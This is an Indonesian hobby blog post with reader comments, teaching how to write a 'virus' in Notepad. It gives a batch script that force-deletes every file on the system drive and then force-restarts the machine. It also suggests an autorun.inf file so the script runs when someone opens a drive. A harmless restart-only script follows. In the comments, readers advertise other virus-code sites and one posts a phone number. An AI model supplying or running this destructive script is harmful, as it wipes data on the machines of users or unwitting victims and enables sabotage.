Membuat Virus Dengan Menggunakan Notepad

Ketik program berikut dengan notepad, dan simpan dengan ekstensi bat, misalnya virus.bat

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

PERHATIAN : Program ini akan menghapus sistem Anda , makanya berhati-hatilah. Saya tidak bertanggung jawab atas semua yang terjadi, silahkan tanggung resiko sendiri.. ck..ckk..

Sebagai tambahan, Anda dapat juga menggunakan kode program berikut. Perintah ini hanya akan me-restart komputer Anda.. Anda aman untuk mencobanya. Sama seperti program virus.bat, program di bawah ini juga harus disimpan dengan ekstensi .bat, misalnya restart.bat

@echo off
shutdown -r -f -t 00

Anda dapat berimprovisasi dengan menambahkan sebuah file autorun.inf file untuk menjalankan program tersebut ketika seseorang melakukan klik ganda pada sebuah drive.
SELAMAT MENCOBA.

6 comments:

SYAFIQ said...

gue juga bisa kalo cuman gitu doank...........

bahkan gue punya kode" lainnya xang lebih jos......... kalo penasaran call me in 085 736 513 239 or My web in sporozoa.multiply.com tapi ndek situ ngak gue posting semua

SYAFIQ said...

hey-hey di mojoagung.tk juga ada kode bikin virus lewat notepad . . . kunjungin aja www.mojoagung.tk (domain baru gue)

SYAFIQ said...

hey-hey di mojoagung.tk juga ada kode bikin virus lewat notepad . . . kunjungin aja www.mojoagung.tk (domain baru gue)

SYAFIQ said...

banyak banget???? di www.bladex.tk loch ada yang lebih simple tapi mematikan . . . >>>>

andi said...

ok bgt,, tank' youw...

[A]gito said...

@Syafiq : makaci nih udah mau berkunjung..
namanya aja masih belajar..
kalo mau agito ajarin donk..
sharing berita gitu..

@andi : OK.. sama-sama.. ^_^

Copyright © 2009 - Manga Maniac - is proudly powered by Blogger
Smashing Magazine - Design Disease - Blog and Web - Dilectio Blogger Template